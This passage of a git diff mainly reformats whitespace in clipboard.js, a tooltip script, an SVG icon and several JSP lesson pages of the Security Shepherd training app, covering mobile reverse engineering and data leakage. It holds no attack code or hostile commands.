-
-                /**
-                 * Delegates a click event on the passed selector.
-                 * @param {String} selector
-                 */
-
-                Clipboard.prototype.delegateClick = function delegateClick(selector) {
-                    var _this = this;
-
-                    this.binding = _delegateEvents2['default'].bind(document.body, selector, 'click', function (e) {
-                        return _this.onClick(e);
-                    });
-                };
-
-                /**
-                 * Undelegates a click event on body.
-                 * @param {String} selector
-                 */
-
-                Clipboard.prototype.undelegateClick = function undelegateClick() {
-                    _delegateEvents2['default'].unbind(document.body, 'click', this.binding);
-                };
-
-                /**
-                 * Defines a new `ClipboardAction` on each click event.
-                 * @param {Event} e
-                 */
-
-                Clipboard.prototype.onClick = function onClick(e) {
-                    if (this.clipboardAction) {
-                        this.clipboardAction = null;
-                    }
-
-                    this.clipboardAction = new _clipboardAction2['default']({
-                        action: this.action(e.delegateTarget),
-                        target: this.target(e.delegateTarget),
-                        text: this.text(e.delegateTarget),
-                        trigger: e.delegateTarget,
-                        emitter: this
-                    });
-                };
-
-                /**
-                 * Default `action` lookup function.
-                 * @param {Element} trigger
-                 */
-
-                Clipboard.prototype.defaultAction = function defaultAction(trigger) {
-                    return getAttributeValue('action', trigger);
-                };
-
-                /**
-                 * Default `target` lookup function.
-                 * @param {Element} trigger
-                 */
-
-                Clipboard.prototype.defaultTarget = function defaultTarget(trigger) {
-                    var selector = getAttributeValue('target', trigger);
-
-                    if (selector) {
-                        return document.querySelector(selector);
-                    }
-                };
-
-                /**
-                 * Default `text` lookup function.
-                 * @param {Element} trigger
-                 */
-
-                Clipboard.prototype.defaultText = function defaultText(trigger) {
-                    return getAttributeValue('text', trigger);
-                };
-
-                /**
-                 * Destroy lifecycle.
-                 */
-
-                Clipboard.prototype.destroy = function destroy() {
-                    this.undelegateClick();
-
-                    if (this.clipboardAction) {
-                        this.clipboardAction.destroy();
-                        this.clipboardAction = null;
-                    }
-                };
-
-                return Clipboard;
-            })(_tinyEmitter2['default']);
-
-            function getAttributeValue(suffix, element) {
-                var attribute = 'data-clipboard-' + suffix;
-
-                if (!element.hasAttribute(attribute)) {
-                    return;
-                }
+/**
+ * Base class which takes a selector, delegates a click event to it,
+ * and instantiates a new `ClipboardAction` on each click.
+ */
 
-                return element.getAttribute(attribute);
-            }
+var Clipboard = (function (_Emitter) {
+    _inherits(Clipboard, _Emitter);
+
+    /**
+     * @param {String} selector
+     * @param {Object} options
+     */
+
+    function Clipboard(selector, options) {
+        _classCallCheck(this, Clipboard);
+
+        _Emitter.call(this);
+
+        this.resolveOptions(options);
+        this.delegateClick(selector);
+    }
+
+    /**
+     * Helper function to retrieve attribute value.
+     * @param {String} suffix
+     * @param {Element} element
+     */
+
+    /**
+     * Defines if attributes would be resolved using internal setter functions
+     * or custom functions that were passed in the constructor.
+     * @param {Object} options
+     */
+
+    Clipboard.prototype.resolveOptions = function resolveOptions() {
+        var options = arguments.length <= 0 || arguments[0] === undefined ? {} : arguments[0];
+
+        this.action = typeof options.action === 'function' ? options.action : this.defaultAction;
+        this.target = typeof options.target === 'function' ? options.target : this.defaultTarget;
+        this.text = typeof options.text === 'function' ? options.text : this.defaultText;
+    };
+
+    /**
+     * Delegates a click event on the passed selector.
+     * @param {String} selector
+     */
+
+    Clipboard.prototype.delegateClick = function delegateClick(selector) {
+        var _this = this;
+
+        this.binding = _delegateEvents2['default'].bind(document.body, selector, 'click', function (e) {
+            return _this.onClick(e);
+        });
+    };
+
+    /**
+     * Undelegates a click event on body.
+     * @param {String} selector
+     */
+
+    Clipboard.prototype.undelegateClick = function undelegateClick() {
+        _delegateEvents2['default'].unbind(document.body, 'click', this.binding);
+    };
+
+    /**
+     * Defines a new `ClipboardAction` on each click event.
+     * @param {Event} e
+     */
+
+    Clipboard.prototype.onClick = function onClick(e) {
+        if (this.clipboardAction) {
+            this.clipboardAction = null;
+        }
+
+        this.clipboardAction = new _clipboardAction2['default']({
+            action: this.action(e.delegateTarget),
+            target: this.target(e.delegateTarget),
+            text: this.text(e.delegateTarget),
+            trigger: e.delegateTarget,
+            emitter: this
+        });
+    };
+
+    /**
+     * Default `action` lookup function.
+     * @param {Element} trigger
+     */
+
+    Clipboard.prototype.defaultAction = function defaultAction(trigger) {
+        return getAttributeValue('action', trigger);
+    };
+
+    /**
+     * Default `target` lookup function.
+     * @param {Element} trigger
+     */
+
+    Clipboard.prototype.defaultTarget = function defaultTarget(trigger) {
+        var selector = getAttributeValue('target', trigger);
+
+        if (selector) {
+            return document.querySelector(selector);
+        }
+    };
+
+    /**
+     * Default `text` lookup function.
+     * @param {Element} trigger
+     */
+
+    Clipboard.prototype.defaultText = function defaultText(trigger) {
+        return getAttributeValue('text', trigger);
+    };
+
+    /**
+     * Destroy lifecycle.
+     */
+
+    Clipboard.prototype.destroy = function destroy() {
+        this.undelegateClick();
+
+        if (this.clipboardAction) {
+            this.clipboardAction.destroy();
+            this.clipboardAction = null;
+        }
+    };
+
+    return Clipboard;
+})(_tinyEmitter2['default']);
+
+function getAttributeValue(suffix, element) {
+    var attribute = 'data-clipboard-' + suffix;
+
+    if (!element.hasAttribute(attribute)) {
+        return;
+    }
+
+    return element.getAttribute(attribute);
+}
 
-            exports['default'] = Clipboard;
-            module.exports = exports['default'];
+exports['default'] = Clipboard;
+module.exports = exports['default'];
 
-        }, {"./clipboard-action": 6, "delegate-events": 1, "tiny-emitter": 5}]
-    }, {}, [7])(7)
+},{"./clipboard-action":6,"delegate-events":1,"tiny-emitter":5}]},{},[7])(7)
 });
\ No newline at end of file
diff --git a/src/main/webapp/js/clipboard-js/clippy.svg b/src/main/webapp/js/clipboard-js/clippy.svg
index 05eed5991..d9122d70e 100644
--- a/src/main/webapp/js/clipboard-js/clippy.svg
+++ b/src/main/webapp/js/clipboard-js/clippy.svg
@@ -1,3 +1,3 @@
 <svg height="1024" width="896" xmlns="http://www.w3.org/2000/svg">
-    <path d="M704 896h-640v-576h640v192h64v-320c0-35-29-64-64-64h-192c0-71-57-128-128-128s-128 57-128 128h-192c-35 0-64 29-64 64v704c0 35 29 64 64 64h640c35 0 64-29 64-64v-128h-64v128z m-512-704c29 0 29 0 64 0s64-29 64-64 29-64 64-64 64 29 64 64 32 64 64 64 33 0 64 0 64 29 64 64h-512c0-39 28-64 64-64z m-64 512h128v-64h-128v64z m448-128v-128l-256 192 256 192v-128h320v-128h-320z m-448 256h192v-64h-192v64z m320-448h-320v64h320v-64z m-192 128h-128v64h128v-64z"/>
+  <path d="M704 896h-640v-576h640v192h64v-320c0-35-29-64-64-64h-192c0-71-57-128-128-128s-128 57-128 128h-192c-35 0-64 29-64 64v704c0 35 29 64 64 64h640c35 0 64-29 64-64v-128h-64v128z m-512-704c29 0 29 0 64 0s64-29 64-64 29-64 64-64 64 29 64 64 32 64 64 64 33 0 64 0 64 29 64 64h-512c0-39 28-64 64-64z m-64 512h128v-64h-128v64z m448-128v-128l-256 192 256 192v-128h320v-128h-320z m-448 256h192v-64h-192v64z m320-448h-320v64h320v-64z m-192 128h-128v64h128v-64z" />
 </svg>
diff --git a/src/main/webapp/js/clipboard-js/tooltips.js b/src/main/webapp/js/clipboard-js/tooltips.js
index 8288da6d0..0b445d838 100644
--- a/src/main/webapp/js/clipboard-js/tooltips.js
+++ b/src/main/webapp/js/clipboard-js/tooltips.js
@@ -1,13 +1,13 @@
 var btns;
 
-function prepTooltips() {
-    btns = document.querySelectorAll('.btn');
-    for (var i = 0; i < btns.length; i++) {
-        btns[i].addEventListener('mouseleave', function (e) {
-            e.currentTarget.setAttribute('class', 'btn');
-            e.currentTarget.removeAttribute('aria-label');
-        });
-    }
+function prepTooltips(){
+	btns = document.querySelectorAll('.btn');
+	for (var i = 0; i < btns.length; i++) {
+	    btns[i].addEventListener('mouseleave', function(e) {
+	        e.currentTarget.setAttribute('class', 'btn');
+	        e.currentTarget.removeAttribute('aria-label');
+	    });
+	}
 }
 
 function showTooltip(elem, msg) {
@@ -20,11 +20,13 @@ function fallbackMessage(action) {
     var actionMsg = '';
     var actionKey = (action === 'cut' ? 'X' : 'C');
 
-    if (/iPhone|iPad/i.test(navigator.userAgent)) {
+    if(/iPhone|iPad/i.test(navigator.userAgent)) {
         actionMsg = 'No support :(';
-    } else if (/Mac/i.test(navigator.userAgent)) {
+    }
+    else if (/Mac/i.test(navigator.userAgent)) {
         actionMsg = 'Press ⌘-' + actionKey + ' to ' + action;
-    } else {
+    }
+    else {
         actionMsg = 'Press Ctrl-' + actionKey + ' to ' + action;
     }
 
diff --git a/src/main/webapp/lessons/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9.jsp b/src/main/webapp/lessons/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9.jsp
index d53a1f8a6..79c5d5bfb 100644
--- a/src/main/webapp/lessons/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9.jsp
+++ b/src/main/webapp/lessons/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9.jsp
@@ -1,121 +1,128 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*, org.owasp.encoder.Encode" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*, org.owasp.encoder.Encode" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    //No Quotes In level Name
-    String levelName = "What is Mobile Reverse Engineering?";
-    //Alphanumeric Only
-    String levelHash = "19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9";
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_reverse_engineering." + levelHash, locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.m_reverse_engineering");
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
+	//No Quotes In level Name
+	String levelName = "What is Mobile Reverse Engineering?";
+	//Alphanumeric Only
+	String levelHash = "19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9";
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_reverse_engineering." + levelHash, locale);
+	ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.m_reverse_engineering");
+	/**
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 * 
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 * 
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 * 
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+	 *
+	 * @author Sean Duggan
+	 */
 
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+	if (request.getSession() != null)
+	{
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+			// Getting Session Variables
+			//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+			
+			String csrfToken = Encode.forHtml(tokenCookie.getValue());
 
+	
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%=translatedLevelName%>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%=translatedLevelName%></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info.1") %>
-        <br/>
-        <br>
-        <%= bundle.getString("paragraph.info.2") %>
-        <br>
-        <br/>
-        <%= bundle.getString("paragraph.info.3") %>
-        <br>
-        <br> <input type="button"
-                    value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/> <br/>
-    <%= bundle.getString("challenge.description") %>
-    <br/> <br/>
-    <%= mobile.getString("mobileBlurb.vmLink.1") + " ReverseEngineer.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
-    <script>
-        $('#hideLesson').click(function () {
-            $("#lessonIntro").hide("slow", function () {
-                $("#showLesson").show("fast");
-            });
-        });
-
-        $("#showLesson").click(function () {
-            $('#showLesson').hide("fast", function () {
-                $("#lessonIntro").show("slow");
-            });
-        });
-    </script>
-    <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-    <% } %>
-    </p>
-</div>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info.1") %>
+			<br />
+			<br>
+			<%= bundle.getString("paragraph.info.2") %>
+			<br>
+			<br />
+			<%= bundle.getString("paragraph.info.3") %>
+			<br>
+			<br> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br /> <br />
+		<%= bundle.getString("challenge.description") %>
+		<br /> <br />
+		<%= mobile.getString("mobileBlurb.vmLink.1") + " ReverseEngineer.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
+		<script>
+				$('#hideLesson').click(function(){
+					$("#lessonIntro").hide("slow", function(){
+						$("#showLesson").show("fast");
+					});
+				});
+				
+				$("#showLesson").click(function(){
+					$('#showLesson').hide("fast", function(){
+						$("#lessonIntro").show("slow");
+					});
+				});
+			</script>
+		<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+		<% } %>
+		</p>
+	</div>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+		}
+		else
+		{
+			response.sendRedirect("../loggedOutSheep.html");
+		}
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
 %>
diff --git a/src/main/webapp/lessons/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.jsp b/src/main/webapp/lessons/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.jsp
index 9f63612cf..a55897351 100644
--- a/src/main/webapp/lessons/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.jsp
+++ b/src/main/webapp/lessons/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.jsp
@@ -1,137 +1,136 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    //No Quotes In level Name
-    String levelName = "What is Mobile Unintended Data Leakage?";
-    //Alphanumeric Only
-    String levelHash = "392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec";
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_unintended_data_leakage." + levelHash, locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.m_uninteded_data_leakage");
+	//No Quotes In level Name
+	String levelName = "What is Mobile Unintended Data Leakage?";
+	//Alphanumeric Only
+	String levelHash = "392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec";
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_unintended_data_leakage." + levelHash, locale);
+	ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.m_uninteded_data_leakage");
+	
+	/**
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 * 
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 * 
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 * 
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+	 *
+	 * @author Sean Duggan
+	 */
 
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <p>
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-
-        <br/>
-        <%= bundle.getString("paragraph.info.1") %>
-        </br>
-        <%= bundle.getString("paragraph.list.header") %>: </br>
-        <ul>
-            <li><%= bundle.getString("paragraph.list.1") %>
-            </li>
-            <li><%= bundle.getString("paragraph.list.2") %>
-            </li>
-            <li><%= bundle.getString("paragraph.list.3") %>
-            </li>
-            <li><%= bundle.getString("paragraph.list.4") %>
-            </li>
-            <li><%= bundle.getString("paragraph.list.5") %>
-            </li>
-            <li><%= bundle.getString("paragraph.list.6") %>
-            </li>
-            <li><%= bundle.getString("paragraph.list.7") %>
-            </li>
-            <li><%= bundle.getString("paragraph.list.8") %>
-            </li>
-        </ul>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<p>
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
 
-        <br>
-        <%= bundle.getString("paragraph.info.1") %>
-        <br> <input type="button"
-                    value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/>
-    <%= bundle.getString("challenge.description") %>
-    <br> <br/>
-    <%= mobile.getString("mobileBlurb.vmLink.1") + " UDataLeakage.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
+			<br />
+			<%= bundle.getString("paragraph.info.1") %>
+			</br>
+			<%= bundle.getString("paragraph.list.header") %>: </br>
+			<ul>
+				<li><%= bundle.getString("paragraph.list.1") %></li>
+				<li><%= bundle.getString("paragraph.list.2") %></li>
+				<li><%= bundle.getString("paragraph.list.3") %></li>
+				<li><%= bundle.getString("paragraph.list.4") %></li>
+				<li><%= bundle.getString("paragraph.list.5") %></li>
+				<li><%= bundle.getString("paragraph.list.6") %></li>
+				<li><%= bundle.getString("paragraph.list.7") %></li>
+				<li><%= bundle.getString("paragraph.list.8") %></li>
+			</ul>
 
-    <script>
-        $('#hideLesson').click(function () {
-            $("#lessonIntro").hide("slow", function () {
-                $("#showLesson").show("fast");
-            });
-        });
+			<br>
+			<%= bundle.getString("paragraph.info.1") %>
+			<br> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br />
+		<%= bundle.getString("challenge.description") %>
+		<br> <br />
+		<%= mobile.getString("mobileBlurb.vmLink.1") + " UDataLeakage.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
 
-        $("#showLesson").click(function () {
-            $('#showLesson').hide("fast", function () {
-                $("#lessonIntro").show("slow");
-            });
-        });
-    </script>
-    <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-    <% } %>
-    </p>
-</div>
+		<script>	
+					$('#hideLesson').click(function(){
+						$("#lessonIntro").hide("slow", function(){
+							$("#showLesson").show("fast");
+						});
+					});
+					
+					$("#showLesson").click(function(){
+						$('#showLesson').hide("fast", function(){
+							$("#lessonIntro").show("slow");
+						});
+					});
+				</script>
+		<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+		<% } %>
+		</p>
+	</div>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/lessons/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.jsp b/src/main/webapp/lessons/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.jsp
index 021ca7a7a..d8cf901c8 100644
--- a/src/main/webapp/lessons/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.jsp
+++ b/src/main/webapp/lessons/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.jsp
@@ -1,125 +1,132 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
+	
+	//No Quotes In level Name
+	String levelName = "Content Provider Leakage Lesson";
+	//Alphanumeric Only
+	String levelHash = "4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39";
+	
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_content_provider_leakage." + levelHash, locale);
+	ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.content_provider_leak");
 
-    //No Quotes In level Name
-    String levelName = "Content Provider Leakage Lesson";
-    //Alphanumeric Only
-    String levelHash = "4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39";
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+	if (request.getSession() != null)
+	{
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
